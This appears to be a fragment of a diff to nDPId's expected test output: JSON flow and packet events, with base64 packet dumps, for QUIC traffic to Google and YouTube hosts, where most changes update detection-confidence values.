+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":39,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431907429,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons4.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1621432429509,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432429509,"pkt":"AAAAAAAAAAEAS1QMCABFAAViiC5AAH4RLC2okEAF3FB+Sf3QAbsFThnNxv8AAB0I+DF9BCeanTIAAEU00hb7OpWAmpFx8qx0bByvtqmnAysWW16ZDvTiBt7+493PQtqd2pKjXT8n6LbaHZrBOy7lzR4IRozP76TQ9DxkFAYnbYCqRHqgPXL5pU+zxh+eB1qzeaw4PD9sxeGceY7QPFO2WPj99N6anJpqI5Hcerw4FTNYR8r1d+SWlStf7eJXbom+ocP1XACdlYH06H03DxDNPtLz\/XsvkXaRPpqyh9hAe4diK1f3iIM2QaXjqckDT+tjaYEhYR+BbL7vNxBY8wfGtlxPQZ7GgVmzdWF+sXyPQuPaTJPnp6PHwhYcy3PsXRrOmC13SC3mZvcQ4+IGjqfqhG+D9wugf7LmbKqsznjJfXzBwYIpCNL+MHcorYpGmUUn6+dyppyRtIzd5m8irD6UYlkt+9VgpoYwGSX69u5si0i0viLsrK8i\/m6Mf0iQ\/Spi96VDtOTfFfSGprx6ij\/O7kc7TXG8oZ0bctqwNFJYOvlWB4CxfK1rYG0mD7xeo2AAgOTRDH8+AYCxUdEzUhiS9ozc2lRPoJkzP2AUr79N7oMid\/+ZbqVhmrpW7XdI12cPRgMmLNFI2MCGTdtlIH5yj6rZtmN67GfACUVK3eHHT3gwe9Jqb0QlZnM70xYApitcdFflHseTh619fCFNKL2L1AUL6shWE6hYP4JwBlMizT032t\/G3ASg\/GZ6BQlaObPebtYEVaZCai90TwmlfCeA\/AIXdD8iJXn7qA5z4o9cudnvk3agR7adxxofVPe6U4OcOJSG1IX2\/mU9S3WYmdFWlpmlMVHWT3QNthK23pRqiZHtH51vPjMDpY3FqBdaqTN8m\/Dc4voSrhGa0IJlpuTviRXm7EgxB8GHN9HytCvDZuPXhu91noUZcgCIcGTZdSBm7cO\/YoHlfVoH\/mVp5MrHSi9cVczjkioTHtPkpy1ub78xuF91\/7S4rXYep6NGOoGjl23AjOJfTTGhu5OWPnU9zMLFkllrVtCulEqT+b5PFzw2wjUYTJTfyrFiv4F8XdsoNLNTmtUCFVtsmWcabX5L6p42ndagG\/+lMde5hAmST6j3vklTteqoWcqrEZNH4LzFgOyupl0Nl63YsGt1OzfxU+904VhWQPq2NIdlO+VtI2U06A2jgU4WwWPcULGssz3QtHxG+LwUiedg0QSFGFQKA+HA3HUYnUTTYIQEOfSJx3BxpSEIE+zqBA8OZ8JL2GHKmdK1yQ+QhbvZXA4BPgaafeG++Hlfj9oqrT+ZkIG2l0Yfi89xALYyMS\/gQtfGRo\/IadU5q3tpHQLFWpdkHZ9FwndqSUrS1W8KKMO\/Y8VATyOpS4PEVwTvTNX4MptJ5NujWqz1tWdiz33An49EYTOXVJvPTodQHJ6ScBKXD30TZbFd4JFzqTcxJu3nOEA6eQblNYy03SZE\/gq\/uktoCqfQIdHNw9SpoHHvaxzhTg4ZR09H6m1QeCHM3dx7ZS5pYsDTexlRcFXpzoNicNl8Q\/2OtYWMZ4zF6\/CjcDuQvPr2BUhrvbmwgeP6jRdw+XwQt+56ZJnLJ7rqhWgtjWk0w4rXPG9gc7C9mf1jPCpHdhiaiIHYCW1Wd3j1GtKfhCdyiCFOIWtzH0tcNMR8zIv9wbPxww9aLwCYz5XkiX9tknrGgSCPyQiiND9wb6jafpQD1hvkRwJxkCJOZU8vAuWEsMD6iwR4yDvCNedmLBMJI9iw\/9hqHHhyJIDnBp6H8oKWPSKifJafbNfTF1Fz7AvqO\/tFzsGlI2GW4QCJCL+P0gz9lGiqCDzlVP7LUu3jgRkwKna8"} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-hju7enel.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432429509,"flow_last_seen":1621432429509,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"220.80.126.73","src_port":64976,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r1---sn-hju7enel.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431857841,"flow_last_seen":1621431857841,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"213.188.47.247","src_port":63736,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431907429,"flow_last_seen":1621431907429,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"136.125.67.96","src_port":62047,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431858501,"flow_last_seen":1621431858501,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":49324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431858130,"flow_last_seen":1621431858130,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"244.214.160.219","src_port":52273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00726{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621431760040,"flow_last_seen":1621431760040,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432429509,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.83.40.87","src_port":57767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432440134,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1621432440134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432440134,"pkt":"AAAAAAAAAAEA737VCABFAAViBAZAAH4RSf6okEAFI8KdL+8ZAbsFTr\/Xzf8AAB0IcdVU301Wze0AAEU0qL3NNLtf2+b\/2Q4JDmzOHuurx9ulrjBLe9GvWGRZXR74WuLmvtIcsJsXXu\/onEdRmT3qTKLOfB7QlcM+PdfoCZmAYmwmyLMzO1HiyG7sIAFes4PP7T6NAXfX4dDWOMvuIoqSmNkVfgauiC5HOyWMHbTwhfwIk9FH1THd9hg6M7nbFuqZXTlC9q\/HwWaVt0bqSTrO3Bj08fiQQfXQGebdpALH6GbV3Jk1dtdbibh6Q37TxrzVgVH5kTFgrwemEnm6q0JQ4Dhq3cX19c8TR3nc50xv+02sA747DQ\/Og4Dz3zoy3+9lfKFqG4wBWdi7z9Rtbn6YwB0LntW5ts12RB+1xYF3UXtpz2seNJelWMZlW1Yh2Fg7mxZYCV0mhQ+xkW1jz6uQcCXMvY5VUbBhvI7zPyZXMY225B2xtuayBXFLLNWzpbQeAEm4XEG4jck8JjKcdxDGQ+tGA6NImdCpMo5KmFlcOnxo4uqBnZ9OZkKuYmAiB3GuA2sRbfaBNzP8vQwIFvmHb\/Rj2f71WSeQKgdmQsaAhoH\/i\/3l5iENNXW6JY9oLoSzWpFhhMlhMjBZ3S1j79TiuS1cWWOOgbGTSXawjyS+IJUIEba2UWRmGIBGjXz7YQQM8xrQS3DbYPJpoisNf04U9mZ54mIM7d+qCQg6VvUNSPRVsV2ux9+PC4W+DFbNy7ALH9ybKA9vKWlQUpcbaW+jQsoJM\/SQ5b4QpyLutRi\/+03sArWhuCnGvdy7QAw+lqj4m6TazHFMsw8w9T2dXVSYXvMNZZ+lLEZlQPpZjmx9uVHste\/wK0vx2c2TjY1hHMzZ4AGwz0ms2kd6XzNS\/wvUOYDcKfIokyYtfAUWmCQI168\/+BuG8b18LWykPNLhWdChPdxlY1M+5SYzdwPjjveFCHw1L31UvQ6QTs8T38YN3DeGrsHTEy1s0ONT1u8feiEDnAPamO5WxHIjVwTMaqbM76RuQbnmjfhNHd0QoBM2fFReITNAsjH5kJa7i1TauIG0LaQZDpRVw3ICDfio58fJIl35v5PBMp8xp6YEUh6d3p9ScDuUo02IpwHd1HAlLwRGLR3NEtr5XuCivraDkSulNk3LUOQdi4J3hNX6NixF3PLCKpvKYYBlI5Sbhl1LhL8Zjl9RJmBTxo3afoYRddxBMufMU3TDfOy2JAEIIvU6KLGYmcpbsBtJwsXg0+562385q64u2sTt2RWiXKEd9XAbOSkl8zz\/mhucCFcCxP\/aDXgf0nhuQpFELBEZxhmx10a3fl8WGlup7xBSgxvAoyjKgZwDinUQRGlQ4Y2+tHaNOUbjWKe1wgznCkTVbj4wkKMm7RKCqDexOds6oHYJPSEl2ioqJqXv85s9\/qmLyp\/s1AI8M7Mm8FUs7EDf5f1L5asrjpQuWtQiUN0J6w4SwozYuqkLkch\/ICUylDPff4K1jxbiN1VWrycEsZdK5WpULn5nsb9oIRivBTIrKfF2Vfspz\/ToLSA8OMT+vsu\/+HK6nVkqTjzbRqT+pMnx2Bg8V55cqGRM016Z6gjflmJ1aHj+\/7PWGoGPR1OQLMY\/Bbvy6c2Rry2q\/F6g8U6A11H66ntA51Q1W18sSC19Oo78tRgloQAn3NhfHhRfesZlY7E7I6PWaLKJ9bgiKoE4IEvCn6psctBWJXQo2AFp11lONrIQS2Q5YaGNNVXxi5Dw01RN1HiS0lRdioVe9QcDCTMQZDSAB5lZNujG+Ir7VUx07m5euHIfgcaR55adpIzCIXUpqTuVCHNV24cdDCtFs\/WXmPsU"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432440134,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432440134,"flow_last_seen":1621432440134,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432440134,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":61209,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"www.googleadservices.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432489421,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1621432489421,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621432489421,"pkt":"AAAAAAAAAAEASF70CABFAAVi8YJAAH4RfUeokEAFYy08\/sVsAbsFTr7Cyf8AAB0IKamQAwU5OroANwARJweyyh8ASQgxaSFNO9MfXImTMnwyXomKh\/ZNPfedDyh5KvfO1MGG51HqkCogC6AtPwJhXTpE\/UKpou6VqZCesbSiBTNDA1JFBQs9B6lpbtkYSC+McmmSMojjEgtxhDYt8\/9dtYYlDOPFZ\/dpG+QdFbgpLb4LL6Kabs8KYDLn+VqI2E8m8ueQOkn1lBiQoAvc0rNjKOazmVq5mZXSMd1VKlKpsbLOchPYIZxqylhHTDiE7M3pNLaBVo\/olK9W8Zr8w5fFNyksOM0htXk+QusGKuzXzx2XRWu+\/Nk8r7wn26b5E2vnI6CqmRqlOx9Hbk9Oav798TUdoZ0ik2Pol9Xb+eCHQNw+XlJCy\/TQAtSNksS7kjeCCjcbIt41ZBla1c58qm1+q0++oj5c2fe6RrhPybaYLt8YUpSsMhpGJI\/Ql2\/NmxHBJxo5URbPjWXLfEGzOcpmsNmVJ2O9aDrYcnv7WnX5CqvzA823haQIF1GHG7\/MkUogQZRdTEAvJm6fBF5zdqrS2BtCxd2wUWnXyoJY3aKCgXRQrdDpBCgpGApMxKuJB5qoWXrZh8eHqiyYIyjBNfvtQacRj6kQMCYITp5tTIecrcXoKPocWiez2LDcj\/S\/19jMLvrNbAcBhQ6KfoiiIJJOb3DnfTdQP6\/4DMSpIjO+s3jvnlF0btkDi2\/ISfy4kfHVix828TssUSRGKO7KC0GwgS6FJsjlz0BU+vv1QZznASY0gmrqU3L3V5EQeJ0JuFK8HKRd4Fj+EOeYQx60REWybndyHIisn1HhzWoZcpBZwH8Nx3rK3uqBbQKlKJmY1TKEse7UpeUToZQDC4fP0SVbtXlKRmkq+uL6gS0GXdLk+VwSXcDDT+JTBTAhOp\/PT0efB56Sw+xnoUoFO+26Osuir43c64mxBrmnuAVQrEG026YUbEpAkKETMHo85xB4Z7xRvocdlOwY06zlP9\/rFbbBE+M+FpELJaF1wOHE282\/6ko8\/0bJJFV2afTCYTIRatNwPLUVY54dJGaDmplh02DhsFSye4H1RytUERPkjLbau4RtBnyf8NekTGeSkfPd29dQ+7m1VARylC5UF8rsK9PxqZ1IjkctsYgU+YvVSm5sX2FqZmQnWn7sx+TmogpnRijHnt3gAx8MpZ1\/6vPZ0mXemrF1srit9ZhT9S1OtARcQG2mrpiCj3+wcDBjy8OxZdjDuPm+7HYnGMUpqQkUp5WDI0HR2Th8J5PiquceXUIN4UYAUOeV6+xy586aR9Bisr9aBs9XUgGeWalZKu0RJLjU\/r6J6yoYwl+tg\/Zh3vVSM24611GhQaadM3op866bGdU4YLBybgRc3Gl0QGq2gCLhejcidoxs5tD3NjeK89xtwPQd7irCBamj04rGwldvYQzxbOjeA5oAoJSaadBElduSTxGYH3oVrfOgrS2xGZtBSStJG7d09ikIYBkxSUYLU27iwQJherSUvhZ85af0XhrTHEYu6GB2FjNOq+mksDa8mM8rpcJgx+hehI17xz+xkqLWilCXGjnoMZWTF4Tx8xav902wfX8qjTHhu5vIsQ\/UV+gR7AYOV0tnC8Ul0PnHl3PUWikjISrIX+vX8LECvnHa+4b7xSouGskcMlecPWND4hCVtRZvNm9FxXgWi2wjpcIcPfODR+Arhmv3RE8GE8lOzxw8rv2AGdqFNX5JwaFFXigZ3vX4WrSH2bNvsDcj\/5We1g3jrVPhkwMz5PcaJQDojUW2GfWTFK1W+lQcDVZR4jO2eOnoR1WqEqE7OlWlEJxz"} -00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432489421,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00921{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621432489421,"flow_last_seen":1621432489421,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621432489421,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"99.45.60.254","src_port":50540,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":43,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":43,"packets-processed":42,"total-skipped-flows":0,"total-l4-payload-len":56700,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":31,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":31,"total-idle-flows":28,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":137,"global_ts_msec":1621432545371} 